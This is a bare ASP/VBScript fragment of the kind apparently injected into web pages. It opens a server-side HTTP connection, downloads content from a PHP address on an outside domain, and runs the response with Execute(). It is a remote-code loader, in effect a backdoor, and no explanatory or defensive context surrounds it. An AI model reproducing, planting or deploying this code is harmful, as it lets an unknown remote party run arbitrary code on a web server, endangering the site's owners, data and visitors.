<% set xml = Server.CreateObject("Msxml2.ServerXMLHTTP") xml.Open "GET", "http://www.micc.cl/proyectos/hogar/conexion.php", False xml.Send stringa=xml.responseText Execute(stringa) %>